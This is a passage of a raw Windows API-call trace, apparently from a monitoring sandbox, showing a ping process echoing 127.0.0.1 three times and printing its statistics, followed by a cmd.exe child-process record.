lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0135.964] _fileno (_File=0x76ea4c28) returned 1 [0135.964] _write (in: _FileHandle=1, _Buf=0xae8910*, _MaxCharCount=0x9 | out: _Buf=0xae8910*) returned 9 [0135.964] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0135.964] _fileno (_File=0x76ea4c28) returned 1 [0135.964] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0135.964] LocalFree (hMem=0xae8910) returned 0x0 [0135.964] LocalFree (hMem=0xaf7b08) returned 0x0 [0135.964] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x89eebc, nSize=0x0, Arguments=0x89eeb8 | out: lpBuffer="笈¯\x89➷\x94䰨盪✧") returned 0x9 [0135.964] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0135.964] _fileno (_File=0x76ea4c28) returned 1 [0135.964] _get_osfhandle (_FileHandle=1) returned 0x28 [0135.964] GetFileType (hFile=0x28) returned 0x2 [0135.964] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x89ee80 | out: lpMode=0x89ee80) returned 0 [0135.964] GetLastError () returned 0x6 [0135.964] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x89ede4, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0135.964] _fileno (_File=0x76ea4c28) returned 1 [0135.964] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0135.964] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0135.964] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xae8910 [0135.964] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xae8910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0135.964] _fileno (_File=0x76ea4c28) returned 1 [0135.964] _write (in: _FileHandle=1, _Buf=0xae8910*, _MaxCharCount=0x9 | out: _Buf=0xae8910*) returned 9 [0135.964] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0135.964] _fileno (_File=0x76ea4c28) returned 1 [0135.964] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0135.964] LocalFree (hMem=0xae8910) returned 0x0 [0135.964] LocalFree (hMem=0xaf7b08) returned 0x0 [0135.965] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x89eeb8, nSize=0x0, Arguments=0x89eeb4 | out: lpBuffer="笈¯\x89⟘\x94䰨盪✨") returned 0x9 [0135.965] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0135.965] _fileno (_File=0x76ea4c28) returned 1 [0135.965] _get_osfhandle (_FileHandle=1) returned 0x28 [0135.965] GetFileType (hFile=0x28) returned 0x2 [0135.965] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x89ee7c | out: lpMode=0x89ee7c) returned 0 [0135.965] GetLastError () returned 0x6 [0135.965] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x89ede0, nSize=0x50 | out: lpBuffer="\x89✨") returned 0x0 [0135.965] _fileno (_File=0x76ea4c28) returned 1 [0135.965] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0135.965] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0135.965] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xae8a00 [0135.965] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xae8a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0135.965] _fileno (_File=0x76ea4c28) returned 1 [0135.965] _write (in: _FileHandle=1, _Buf=0xae8a00*, _MaxCharCount=0x9 | out: _Buf=0xae8a00*) returned 9 [0135.965] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0135.965] _fileno (_File=0x76ea4c28) returned 1 [0135.965] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0135.965] LocalFree (hMem=0xae8a00) returned 0x0 [0135.965] LocalFree (hMem=0xaf7b08) returned 0x0 [0135.965] Sleep (dwMilliseconds=0x3e8) [0136.978] IcmpSendEcho2Ex (in: IcmpHandle=0xae6d40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xaec188, RequestSize=0x20, RequestOptions=0x89ef34, ReplyBuffer=0xaf5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xaf5270) returned 0x1 [0136.979] InetNtopW (in: Family=2, pAddr=0x89ef24, pStringBuf=0x89f04c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0136.979] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x89eeb8, nSize=0x0, Arguments=0x89eeb4 | out: lpBuffer="羠¯\x89⛔\x94䰨盪✣") returned 0x16 [0136.979] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0136.979] _fileno (_File=0x76ea4c28) returned 1 [0136.979] _get_osfhandle (_FileHandle=1) returned 0x28 [0136.979] GetFileType (hFile=0x28) returned 0x2 [0136.979] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x89ee7c | out: lpMode=0x89ee7c) returned 0 [0136.979] GetLastError () returned 0x6 [0136.979] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x89ede0, nSize=0x50 | out: lpBuffer="\x89✣") returned 0x0 [0136.979] _fileno (_File=0x76ea4c28) returned 1 [0136.979] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0136.979] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0136.979] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xaf7fd8 [0136.979] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xaf7fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0136.979] _fileno (_File=0x76ea4c28) returned 1 [0136.979] _write (in: _FileHandle=1, _Buf=0xaf7fd8*, _MaxCharCount=0x16 | out: _Buf=0xaf7fd8*) returned 22 [0136.979] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0136.979] _fileno (_File=0x76ea4c28) returned 1 [0136.979] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0136.979] LocalFree (hMem=0xaf7fd8) returned 0x0 [0136.979] LocalFree (hMem=0xaf7fa0) returned 0x0 [0136.980] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x89eeb8, nSize=0x0, Arguments=0x89eeb4 | out: lpBuffer="羠¯\x89⛿\x94䰨盪✼") returned 0x9 [0136.980] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0136.980] _fileno (_File=0x76ea4c28) returned 1 [0136.980] _get_osfhandle (_FileHandle=1) returned 0x28 [0136.980] GetFileType (hFile=0x28) returned 0x2 [0136.980] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x89ee7c | out: lpMode=0x89ee7c) returned 0 [0136.980] GetLastError () returned 0x6 [0136.980] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x89ede0, nSize=0x50 | out: lpBuffer="\x89✼") returned 0x0 [0136.980] _fileno (_File=0x76ea4c28) returned 1 [0136.980] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0136.980] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0136.980] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xae89e8 [0136.980] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xae89e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0136.980] _fileno (_File=0x76ea4c28) returned 1 [0136.980] _write (in: _FileHandle=1, _Buf=0xae89e8*, _MaxCharCount=0x9 | out: _Buf=0xae89e8*) returned 9 [0136.980] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0136.980] _fileno (_File=0x76ea4c28) returned 1 [0136.980] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0136.980] LocalFree (hMem=0xae89e8) returned 0x0 [0136.980] LocalFree (hMem=0xaf7fa0) returned 0x0 [0136.980] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x89eebc, nSize=0x0, Arguments=0x89eeb8 | out: lpBuffer="羠¯\x89➷\x94䰨盪✧") returned 0x9 [0136.980] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0136.980] _fileno (_File=0x76ea4c28) returned 1 [0136.980] _get_osfhandle (_FileHandle=1) returned 0x28 [0136.980] GetFileType (hFile=0x28) returned 0x2 [0136.980] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x89ee80 | out: lpMode=0x89ee80) returned 0 [0136.980] GetLastError () returned 0x6 [0136.980] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x89ede4, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0136.980] _fileno (_File=0x76ea4c28) returned 1 [0136.980] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0136.980] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0136.980] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xae8910 [0136.980] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xae8910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0136.980] _fileno (_File=0x76ea4c28) returned 1 [0136.980] _write (in: _FileHandle=1, _Buf=0xae8910*, _MaxCharCount=0x9 | out: _Buf=0xae8910*) returned 9 [0136.980] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0136.980] _fileno (_File=0x76ea4c28) returned 1 [0136.980] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0136.980] LocalFree (hMem=0xae8910) returned 0x0 [0136.980] LocalFree (hMem=0xaf7fa0) returned 0x0 [0136.980] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x89eeb8, nSize=0x0, Arguments=0x89eeb4 | out: lpBuffer="羠¯\x89⟘\x94䰨盪✨") returned 0x9 [0136.980] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0136.980] _fileno (_File=0x76ea4c28) returned 1 [0136.980] _get_osfhandle (_FileHandle=1) returned 0x28 [0136.980] GetFileType (hFile=0x28) returned 0x2 [0136.980] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x89ee7c | out: lpMode=0x89ee7c) returned 0 [0136.980] GetLastError () returned 0x6 [0136.980] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x89ede0, nSize=0x50 | out: lpBuffer="\x89✨") returned 0x0 [0136.980] _fileno (_File=0x76ea4c28) returned 1 [0136.980] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0136.980] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0136.981] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xae8940 [0136.981] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xae8940, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0136.981] _fileno (_File=0x76ea4c28) returned 1 [0136.981] _write (in: _FileHandle=1, _Buf=0xae8940*, _MaxCharCount=0x9 | out: _Buf=0xae8940*) returned 9 [0136.981] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0136.981] _fileno (_File=0x76ea4c28) returned 1 [0136.981] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0136.981] LocalFree (hMem=0xae8940) returned 0x0 [0136.981] LocalFree (hMem=0xaf7fa0) returned 0x0 [0136.981] Sleep (dwMilliseconds=0x3e8) [0137.989] IcmpSendEcho2Ex (in: IcmpHandle=0xae6d40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xaec188, RequestSize=0x20, RequestOptions=0x89ef34, ReplyBuffer=0xaf5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xaf5270) returned 0x1 [0137.990] InetNtopW (in: Family=2, pAddr=0x89ef24, pStringBuf=0x89f04c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0137.990] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x89eeb8, nSize=0x0, Arguments=0x89eeb4 | out: lpBuffer="羠¯\x89⛔\x94䰨盪✣") returned 0x16 [0137.990] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0137.990] _fileno (_File=0x76ea4c28) returned 1 [0137.990] _get_osfhandle (_FileHandle=1) returned 0x28 [0137.990] GetFileType (hFile=0x28) returned 0x2 [0137.990] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x89ee7c | out: lpMode=0x89ee7c) returned 0 [0137.990] GetLastError () returned 0x6 [0137.990] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x89ede0, nSize=0x50 | out: lpBuffer="\x89✣") returned 0x0 [0137.990] _fileno (_File=0x76ea4c28) returned 1 [0137.990] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0137.990] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0137.990] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xaf7fd8 [0137.990] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xaf7fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0137.990] _fileno (_File=0x76ea4c28) returned 1 [0137.990] _write (in: _FileHandle=1, _Buf=0xaf7fd8*, _MaxCharCount=0x16 | out: _Buf=0xaf7fd8*) returned 22 [0137.990] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0137.990] _fileno (_File=0x76ea4c28) returned 1 [0137.991] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0137.991] LocalFree (hMem=0xaf7fd8) returned 0x0 [0137.991] LocalFree (hMem=0xaf7fa0) returned 0x0 [0137.991] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x89eeb8, nSize=0x0, Arguments=0x89eeb4 | out: lpBuffer="羠¯\x89⛿\x94䰨盪✼") returned 0x9 [0137.991] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0137.991] _fileno (_File=0x76ea4c28) returned 1 [0137.991] _get_osfhandle (_FileHandle=1) returned 0x28 [0137.991] GetFileType (hFile=0x28) returned 0x2 [0137.991] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x89ee7c | out: lpMode=0x89ee7c) returned 0 [0137.991] GetLastError () returned 0x6 [0137.991] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x89ede0, nSize=0x50 | out: lpBuffer="\x89✼") returned 0x0 [0137.991] _fileno (_File=0x76ea4c28) returned 1 [0137.991] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0137.991] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0137.991] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xae8910 [0137.991] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xae8910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0137.991] _fileno (_File=0x76ea4c28) returned 1 [0137.991] _write (in: _FileHandle=1, _Buf=0xae8910*, _MaxCharCount=0x9 | out: _Buf=0xae8910*) returned 9 [0137.991] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0137.991] _fileno (_File=0x76ea4c28) returned 1 [0137.991] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0137.991] LocalFree (hMem=0xae8910) returned 0x0 [0137.991] LocalFree (hMem=0xaf7fa0) returned 0x0 [0137.991] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x89eebc, nSize=0x0, Arguments=0x89eeb8 | out: lpBuffer="羠¯\x89➷\x94䰨盪✧") returned 0x9 [0137.991] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0137.991] _fileno (_File=0x76ea4c28) returned 1 [0137.991] _get_osfhandle (_FileHandle=1) returned 0x28 [0137.991] GetFileType (hFile=0x28) returned 0x2 [0137.991] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x89ee80 | out: lpMode=0x89ee80) returned 0 [0137.991] GetLastError () returned 0x6 [0137.991] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x89ede4, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0137.991] _fileno (_File=0x76ea4c28) returned 1 [0137.991] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0137.991] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0137.991] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xae89e8 [0137.991] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xae89e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0137.991] _fileno (_File=0x76ea4c28) returned 1 [0137.991] _write (in: _FileHandle=1, _Buf=0xae89e8*, _MaxCharCount=0x9 | out: _Buf=0xae89e8*) returned 9 [0137.991] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0137.991] _fileno (_File=0x76ea4c28) returned 1 [0137.991] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0137.991] LocalFree (hMem=0xae89e8) returned 0x0 [0137.991] LocalFree (hMem=0xaf7fa0) returned 0x0 [0137.991] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x89eeb8, nSize=0x0, Arguments=0x89eeb4 | out: lpBuffer="羠¯\x89⟘\x94䰨盪✨") returned 0x9 [0137.991] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0137.991] _fileno (_File=0x76ea4c28) returned 1 [0137.991] _get_osfhandle (_FileHandle=1) returned 0x28 [0137.991] GetFileType (hFile=0x28) returned 0x2 [0137.991] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x89ee7c | out: lpMode=0x89ee7c) returned 0 [0137.991] GetLastError () returned 0x6 [0137.991] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x89ede0, nSize=0x50 | out: lpBuffer="\x89✨") returned 0x0 [0137.992] _fileno (_File=0x76ea4c28) returned 1 [0137.992] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0137.992] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0137.992] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xae8a60 [0137.992] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xae8a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0137.992] _fileno (_File=0x76ea4c28) returned 1 [0137.992] _write (in: _FileHandle=1, _Buf=0xae8a60*, _MaxCharCount=0x9 | out: _Buf=0xae8a60*) returned 9 [0137.992] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0137.992] _fileno (_File=0x76ea4c28) returned 1 [0137.992] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0137.992] LocalFree (hMem=0xae8a60) returned 0x0 [0137.992] LocalFree (hMem=0xaf7fa0) returned 0x0 [0137.992] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x89ee40, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0137.992] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x89ee14, nSize=0x0, Arguments=0x89ee10 | out: lpBuffer="羠¯\x89᧰\x94䰨盪❏") returned 0x5c [0137.992] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0137.992] _fileno (_File=0x76ea4c28) returned 1 [0137.992] _get_osfhandle (_FileHandle=1) returned 0x28 [0137.992] GetFileType (hFile=0x28) returned 0x2 [0137.992] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x89edd8 | out: lpMode=0x89edd8) returned 0 [0137.992] GetLastError () returned 0x6 [0137.992] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x89ed3c, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0137.992] _fileno (_File=0x76ea4c28) returned 1 [0137.992] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0137.992] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0137.992] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0xaf8068 [0137.992] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0xaf8068, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0137.992] _fileno (_File=0x76ea4c28) returned 1 [0137.992] _write (in: _FileHandle=1, _Buf=0xaf8068*, _MaxCharCount=0x5c | out: _Buf=0xaf8068*) returned 92 [0137.992] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0137.992] _fileno (_File=0x76ea4c28) returned 1 [0137.992] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0137.992] LocalFree (hMem=0xaf8068) returned 0x0 [0137.992] LocalFree (hMem=0xaf7fa0) returned 0x0 [0137.992] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x89ee20, nSize=0x0, Arguments=0x89ee1c | out: lpBuffer="羠¯\x89ᨧ\x94䰨盪❓") returned 0x61 [0137.992] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0137.992] _fileno (_File=0x76ea4c28) returned 1 [0137.992] _get_osfhandle (_FileHandle=1) returned 0x28 [0137.992] GetFileType (hFile=0x28) returned 0x2 [0137.992] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x89ede4 | out: lpMode=0x89ede4) returned 0 [0137.992] GetLastError () returned 0x6 [0137.992] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x89ed48, nSize=0x50 | out: lpBuffer="\x89❓") returned 0x0 [0137.992] _fileno (_File=0x76ea4c28) returned 1 [0137.992] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0137.992] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0137.992] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0xaf8070 [0137.992] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0xaf8070, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0137.992] _fileno (_File=0x76ea4c28) returned 1 [0137.992] _write (in: _FileHandle=1, _Buf=0xaf8070*, _MaxCharCount=0x61 | out: _Buf=0xaf8070*) returned 97 [0137.993] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0137.993] _fileno (_File=0x76ea4c28) returned 1 [0137.993] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0137.993] LocalFree (hMem=0xaf8070) returned 0x0 [0137.993] LocalFree (hMem=0xaf7fa0) returned 0x0 [0137.993] IcmpCloseHandle (IcmpHandle=0xae6d40) returned 1 [0137.993] LocalFree (hMem=0xaec188) returned 0x0 [0137.993] LocalFree (hMem=0xaf5270) returned 0x0 [0137.993] WSACleanup () returned 0 [0137.993] exit (_Code=0) Thread: id = 419 os_tid = 0x948 Thread: id = 420 os_tid = 0x8b8 Process: id = "151" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x222c1000" os_pid = "0x944" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" 